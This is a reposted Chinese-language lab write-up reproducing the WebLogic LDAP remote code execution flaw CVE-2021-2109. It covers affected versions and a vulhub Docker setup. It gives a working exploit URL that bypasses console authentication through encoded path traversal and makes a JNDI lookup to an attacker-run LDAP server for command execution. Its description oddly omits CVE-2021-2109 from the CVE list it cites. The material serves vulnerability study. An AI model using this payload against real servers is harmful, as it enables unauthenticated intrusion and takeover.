Weblogic LDAP 遠程代碼執行漏洞 CVE-2021-2109復現


Weblogic LDAP 遠程代碼執行漏洞 CVE-2021-2109

漏洞描述

2021年1月20日,綠盟科技監測發現Oracle官方發布了2021年1月關鍵補丁更新公告CPU(Critical Patch Update),共修復了329個不同程度的漏洞,其中包括7個影響WebLogic的嚴重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未經身份驗證的攻擊者可通過此次的漏洞實現遠程代碼執行。CVSS評分均為9.8,利用復雜度低。建議用戶盡快采取措施,對上述漏洞進行防護。

漏洞影響

WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0

環境搭建

$ git clone https://github.com/vulhub/vulhub.git
$ cd vulhub/weblogic/CVE-2020-14882
$ sudo docker-compose up -d 

漏洞復現

未授權訪問,如果有此頁面未授權可訪問,且WebLogic為受影響的版本,則可能存在漏洞:http://x.x.x.x:7001/console/css/%2e%2e%2f/consolejndi.portal

服務器上下載、啟動LDAP,https://github.com/feihong-cs/JNDIExploit/

exp(注意,IP地址第三個分隔符是;),任意命令執行:

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

參考鏈接


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM